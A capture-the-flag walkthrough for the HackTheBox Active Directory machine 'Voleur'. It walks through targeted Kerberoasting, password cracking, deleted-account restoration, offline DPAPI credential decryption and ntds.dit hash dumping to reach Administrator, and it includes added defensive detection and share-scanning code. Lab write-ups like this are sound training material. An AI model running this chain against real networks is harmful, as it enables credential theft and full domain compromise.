HackTheBox Voleur Walkthrough


This was a medium Active Directory machine. We start with the credentials ryan.naylor:HollowOct31Nyt; NTLM is disabled on the box, so we will authenticate with Kerberos throughout.
Initial Enumeration
The nmap scan shows nothing unusual, just SSH on port 2222.
BloodHound with the initial user also did not give me much.
Foothold and user.txt
First we will explore the SMB shares, using a Kerberos ticket since NTLM is disabled:
impacket-getTGT 'VOLEUR.HTB/ryan.naylor':'HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache
impacket-smbclient -k -no-pass VOLEUR.HTB/ryan.naylor@dc.voleur.htb
The IT share has a folder called First-Line Support containing a file called Access_Review.xlsx. The file is password protected, so we crack it with john:
office2john Access_Review.xlsx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
After cracking the password and opening the file, you will find some accounts and their passwords.
With these in BloodHound we can see that svc_ldap has WriteSPN rights over svc_winrm, so we can do a targeted Kerberoast:
impacket-getTGT 'VOLEUR.HTB/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCNAME=svc_ldap.ccache
python targetedKerberoast.py -k --dc-host dc.voleur.htb -d VOLEUR.HTB
Crack the hash with john the ripper:
john svcc_winrm.txt --wordlist=/usr/share/wordlists/rockyou.txt
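From the defender's side, the WriteSPN abuse above leaves a characteristic trail: a Security event 5136 (directory object modified) where servicePrincipalName is written on a user by a different account, followed shortly by a 4769 (TGS request) for that same account with ticket encryption type 0x17 (RC4), which is what makes the ticket crackable with john. The following is an added example, not part of the original walkthrough or of any tool it uses, that correlates those two event types over constructed sample events. The field names are simplified from the Windows event XML, the 30-minute window is an assumption, and the svc_sql account and the SPN values are made up for the sample.

```python
from datetime import datetime, timedelta

# Encryption types in the 4769 "Ticket Encryption Type" field that indicate a
# crackable RC4 service ticket (0x17 = RC4-HMAC, 0x18 = RC4-HMAC-EXP).
RC4_ETYPES = {"0x17", "0x18"}
# Assumption: how long after the SPN write a TGS request still counts as related.
WINDOW = timedelta(minutes=30)

# Constructed sample events (not real logs). Field names are simplified from the
# Windows Security event XML: 5136 = directory object modified, 4769 = TGS request.
SAMPLE_EVENTS = [
    # svc_ldap writes an SPN onto svc_winrm, then requests its ticket with RC4
    {"id": 5136, "time": "2025-01-10T09:00:00", "subject": "svc_ldap",
     "object": "svc_winrm", "attribute": "servicePrincipalName",
     "value": "HTTP/kerberoast.voleur.htb"},
    {"id": 4769, "time": "2025-01-10T09:00:45", "subject": "svc_ldap",
     "service": "svc_winrm", "etype": "0x17"},
    # benign (constructed): an admin adds an SPN; only an AES ticket is requested hours later
    {"id": 5136, "time": "2025-01-10T10:00:00", "subject": "Administrator",
     "object": "svc_sql", "attribute": "servicePrincipalName",
     "value": "MSSQLSvc/db.voleur.htb"},
    {"id": 4769, "time": "2025-01-10T14:00:00", "subject": "ryan.naylor",
     "service": "svc_sql", "etype": "0x12"},
    # unrelated: an ordinary AES ticket for a computer account
    {"id": 4769, "time": "2025-01-10T11:30:00", "subject": "ryan.naylor",
     "service": "DC$", "etype": "0x12"},
]


def _t(s):
    return datetime.fromisoformat(s)


def detect_targeted_kerberoast(events, window=WINDOW):
    """Correlate servicePrincipalName writes (5136) with RC4 TGS requests (4769)
    for the same account inside `window`. Returns a list of alert dicts."""
    spn_writes = [e for e in events
                  if e["id"] == 5136 and e.get("attribute") == "servicePrincipalName"]
    tgs_requests = [e for e in events if e["id"] == 4769]
    alerts = []
    for w in spn_writes:
        t0 = _t(w["time"])
        for r in tgs_requests:
            delta = _t(r["time"]) - t0
            if (r["service"].lower() == w["object"].lower()
                    and r["etype"].lower() in RC4_ETYPES
                    and timedelta(0) <= delta <= window):
                alerts.append({
                    "writer": w["subject"], "target": w["object"], "spn": w["value"],
                    "requester": r["subject"],
                    "seconds_after_write": int(delta.total_seconds()),
                })
    return alerts


def rc4_requests_for_user_accounts(events):
    """Secondary signal that needs no 5136 auditing: any RC4 service ticket for a
    non-computer account (no trailing '$'), which an AES-only domain should never see."""
    return [e for e in events
            if e["id"] == 4769 and e["etype"].lower() in RC4_ETYPES
            and not e["service"].endswith("$")]


if __name__ == "__main__":
    for a in detect_targeted_kerberoast(SAMPLE_EVENTS):
        print("targeted kerberoast pattern:", a)
    for e in rc4_requests_for_user_accounts(SAMPLE_EVENTS):
        print("RC4 ticket for user account:", e["service"], "by", e["subject"])
```

Event 5136 only appears when Directory Service Changes auditing is enabled and the user objects carry a SACL covering attribute writes; where it is missing, the RC4 check on its own still catches the ticket request. The root-cause fix is removing the WriteSPN ACE that svc_ldap holds over svc_winrm and giving service accounts long random passwords or AES-only Kerberos settings.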
Now we request a TGT for svc_winrm and get a shell to read user.txt:
impacket-getTGT 'VOLEUR.HTB/svc_winrm':'<put_pass_here>'
export KRB5CCNAME=svc_winrm.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb
Privilege Escalation and root.txt
In Access_Review.xlsx we can also see that the user todd.wolfe has been deleted (or marked as deleted). First we restore that account using svc_ldap, which works because svc_ldap is a member of the Restore_Users group:
bloodyAD --host dc.voleur.htb -d voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k set restore 'todd.wolfe'
Use the latest bloodyAD version, otherwise you will get errors.
After restoring the account, we move on to the SMB share contents of todd.wolfe and decrypt the password of the user jeremy.combs:
impacket-getTGT 'VOLEUR.HTB/todd.wolfe':'<pass_here_of_todd>'
export KRB5CCNAME=todd.wolfe.ccache
impacket-smbclient -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb
use IT
cd /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/
get 772275FAD58525253490A9B0039791D3
cd /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110
get 08949382-134f-4c63-b93c-ce52efc0aa88
Then decrypt the master key with todd.wolfe's password and SID, and use the resulting key on the credential blob:
impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password '<pass_of_todd>' -sid S-1-5-21-3927696377-1337352550-2781715495-1110
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
This gives you the password of jeremy.combs.
Then we access the SMB shares as jeremy.combs, where we find a note and an SSH id_rsa key. The note said
Here the admin is talking about svc_backup, so we log in over SSH as that user with the key:
ssh -i id_rsa svc_backup@voleur.htb -p 2222
After exploring over SSH and running linpeas, I found a copy of ntds.dit, which we will use to dump the hashes of the Administrator and other users. First go to /mnt/c/IT/Third-Line Support/Backups/Active Directory
and copy ntds.dit to /tmp, then go to /mnt/c/IT/Third-Line Support/Backups/registry
and copy the SYSTEM file to /tmp. Then use scp to copy both to our machine:
scp -i id_rsa -P 2222 svc_backup@voleur.htb:/tmp/ntds.dit /path/to/save
scp -i id_rsa -P 2222 svc_backup@voleur.htb:/tmp/SYSTEM /path/to/save
Then we use impacket-secretsdump to dump the hashes locally:
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
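The DPAPI material under the archived todd.wolfe profile and the ntds.dit plus SYSTEM pair in the backup folder are two instances of the same hygiene problem: credential material that is recoverable offline, sitting on a share that low-privileged accounts can read. The following is an added example, not part of the original walkthrough or of impacket, that scans a copy of such a share tree and reports those artifacts, pairing credential blobs with master keys per profile (both are needed, together with the user's password and SID, for the dpapi steps above) and ntds.dit with the SYSTEM hive (both are needed for secretsdump). The directory layout, SID and file names come from this page; the jane.doe profile with a lone blob is a constructed extra to show the partial case.

```python
import re
import tempfile
from pathlib import Path

# File-name shapes of the artifacts involved: DPAPI master keys are GUID-named,
# credential blobs are 32 upper-case hex characters, Protect subfolders are user SIDs.
MASTERKEY_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
CRED_BLOB_RE = re.compile(r"^[0-9A-F]{32}$")
SID_RE = re.compile(r"^S-1-5-21(-\d+){4}$", re.I)


def scan_share(root):
    """Walk an exported share tree and report credential material that can be
    recovered offline. Returns a list of finding dicts (profiles first, sorted)."""
    root = Path(root)
    profiles = {}            # profile dir -> {"blobs": [], "masterkeys": [], "sids": set()}
    ntds, hives = [], []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).parts
        low = [p.lower() for p in rel]
        name = path.name
        # Domain backup artifacts: the ntds.dit database and the SYSTEM hive holding its boot key.
        if name.lower() == "ntds.dit":
            ntds.append(path.relative_to(root).as_posix())
        elif name.lower() == "system":
            hives.append(path.relative_to(root).as_posix())
        if "appdata" not in low:
            continue
        # Everything before AppData is the (archived) user profile.
        profile = "/".join(rel[:low.index("appdata")])
        entry = profiles.setdefault(profile, {"blobs": [], "masterkeys": [], "sids": set()})
        # ...\Microsoft\Credentials\<32 hex>  -> DPAPI credential blob
        if len(low) >= 2 and low[-2] == "credentials" and CRED_BLOB_RE.match(name):
            entry["blobs"].append(name)
        # ...\Microsoft\Protect\<SID>\<GUID>  -> DPAPI master key file
        elif len(low) >= 3 and low[-3] == "protect" and SID_RE.match(rel[-2]) and MASTERKEY_RE.match(name):
            entry["masterkeys"].append(name)
            entry["sids"].add(rel[-2])

    findings = []
    for profile, e in sorted(profiles.items()):
        if not (e["blobs"] or e["masterkeys"]):
            continue
        kind = "dpapi_complete" if (e["blobs"] and e["masterkeys"]) else "dpapi_partial"
        findings.append({"kind": kind, "profile": profile, "blobs": len(e["blobs"]),
                         "masterkeys": len(e["masterkeys"]), "sids": sorted(e["sids"])})
    if ntds:
        kind = "ntds_with_system_hive" if hives else "ntds_without_system_hive"
        findings.append({"kind": kind, "ntds": sorted(ntds), "system": sorted(hives)})
    return findings


def build_sample_share(base):
    """Create a constructed directory tree mirroring the layout seen on the box."""
    base = Path(base)
    files = [
        "IT/First-Line Support/Access_Review.xlsx",
        "IT/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3",
        "IT/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88",
        # constructed profile with a blob but no master key: not decryptable from the share alone
        "IT/Second-Line Support/Archived Users/jane.doe/AppData/Roaming/Microsoft/Credentials/0123456789ABCDEF0123456789ABCDEF",
        "IT/Third-Line Support/Backups/Active Directory/ntds.dit",
        "IT/Third-Line Support/Backups/registry/SYSTEM",
    ]
    for f in files:
        p = base / f
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(b"placeholder")   # contents do not matter for the scan
    return base


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_share(build_sample_share(tmp))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a mounted or copied share instead of the temp tree by calling scan_share with that path. A "dpapi_complete" profile means the only thing standing between a share reader and the stored credentials is the user's password, and "ntds_with_system_hive" means every domain hash is recoverable; archived profiles should have their AppData\Roaming\Microsoft\Credentials and Protect folders removed, and AD backups should not live on a share that support staff or a backup service account on a Linux host can read.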
This gives us the NTLM hash of the Administrator, so we request a TGT for that account with the hash and get a shell to read root.txt:
impacket-getTGT 'VOLEUR.HTB/Administrator' -hashes <LM:NT>
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb
This is it for this machine.
Thanks for reading the walkthrough, hope you liked it! Do leave a comment for feedback or queries!
Written by stillempty
